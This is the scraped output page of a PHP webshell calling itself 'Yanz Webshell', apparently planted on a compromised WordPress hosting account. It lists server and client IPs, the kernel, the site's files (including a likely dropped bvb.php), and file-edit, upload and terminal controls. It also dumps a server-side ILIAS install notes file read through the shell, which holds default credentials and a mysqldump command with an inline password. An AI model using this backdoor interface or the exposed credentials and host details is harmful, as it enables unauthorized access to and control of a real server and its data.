Attention:
Uname:
Php:
Hdd:
Cwd:
Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
8.3.30 Safe mode: OFF Datetime: 2026-05-06 22:52:03
3907.15 GB Free: 1073.11 GB (27%)
/home/repauqkb/public_html/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
198.54.116.179
Client IP:
216.73.217.139
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2026-05-06 22:02:23drwxr-xr-xRename Touch
[ .. ]dir2025-04-18 09:10:57drwx--x--xRename Touch
[ wp-admin ]dir2026-05-06 18:34:07drwxr-xr-xRename Touch
[ wp-content ]dir2026-05-05 01:36:33drwxr-x---Rename Touch
[ wp-includes ]dir2026-05-06 22:51:22drwxr-xr-xRename Touch
bvb.php2.21 KB2026-05-06 22:02:23-rw-r--r--Rename Touch Edit Download
error_log835 B2026-05-06 21:55:07-rw-r--r--Rename Touch Edit Download
index.php246 B2026-05-06 18:34:08-rw-r--r--Rename Touch Edit Download
license.txt19.44 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-activate.php7.18 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-blog-header.php351 B2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-config.php3.55 KB2026-03-27 14:45:59-rw-r--r--Rename Touch Edit Download
wp-cron.php5.49 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.43 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-login.php50.23 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-settings.php30.33 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
wp-trackback.php5.09 KB2026-05-06 18:34:07-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Terminal:
Upload file: (Writeable)

HEX
HEX
Server: LiteSpeed
System: Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: repauqkb (12019)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //var/softaculous/ilias/notes.txt
1. Before starting manual installation copy /components/ILIAS/setup_/minimal-config.json to /data_dir/config.json and fill neccessary details refering following guide. (Add parameter "Database" as well) Refer /docs/configuration/install.md

2. Install using following command.
php cli/setup.php install [[data_dir]]/config.json

### Keep root directory writable before starting manual installation ###

To fill config.json: https://docu.ilias.de/ilias.php?ref_id=367&obj_id=75023&cmd=layout&cmdClass=illmpresentationgui&cmdNode=13g&baseClass=ilLMPresentationGUI
Default Credentials are:
Username: root
Password: homer

3. Enter "clientid" in Client ID.
4. set location of ilias.log in [[softdatadir]]\ilias.log in manual
5. set location of log folder in [[softdatadir]]\logs in manual
6. client.ini.php is writable admin can delete and create new client, permission is required to delete the client.
7. Keep timezone = "America/New_York" and [log] details as it is in ilias.ini.php
8. Check and create symlinks in every version.
9. PHP REQUIREMENT LINK : https://docu.ilias.de/ilias.php?ref_id=367&obj_id=75023&cmd=layout&cmdClass=illmpresentationgui&cmdNode=13g&baseClass=ilLMPresentationGUI#system-requirements
10. Windows not supported : https://www.ilias.de/docu/goto.php?target=lm_367&client_id=docu#supported-platforms
11. apply following settings in php.ini to resolve strict error confirmed with vendor
error_reporting = E_ALL & ~E_NOTICE & ~E_DEPRECATED & ~E_STRICT;
display_errors = Off
12. SQL export doesn't works on server, take sql dump using command. mysqldump --routines -u root -pmysql ilias100 > ilias100.sql(Take sql dump when CLI install is complete)
13. Keep ilias_uuid value as it is because it is constant for all installations. (/setup/sql/ilias3.sql)
14 We have created config.json file in softdatadir because installer states to keep this file outside doc-root.
https://docu.ilias.de/goto_docu_pg_124784_367.html
15. Keep /logs folder and ilias.log file in data directory as we have put these path in config.json for error log.
16. Ignore the directories created in [[softpath]]/public/data/ during manual installation. The script uses data directory path which is outside webroot.
17. ILIAS supports only CLI upgrade.
https://docu.ilias.de/ilias.php?baseClass=illmpresentationgui&obj_id=75023&ref_id=367#upgrading-ilias
18. Check and move /datadir/clientid/storage/fsv2
19. Under `settings` table in sql, make sure that details filled in config.json i.e admin_fname, admin_lname, admin_email are configured in sql as well.
20. Ilias 10 doesn't support utf8mb4 collations, so while making manual installation on MYSQL 8, select utf8mb3_general_ci as collation via phpmyadmin (Earlier utf8_general_ci). This is mentioned in official docs
https://docu.ilias.de/ilias.php?ref_id=367&obj_id=75023&cmd=layout&cmdClass=illmpresentationgui&cmdNode=13g&baseClass=ilLMPresentationGUI#system-requirements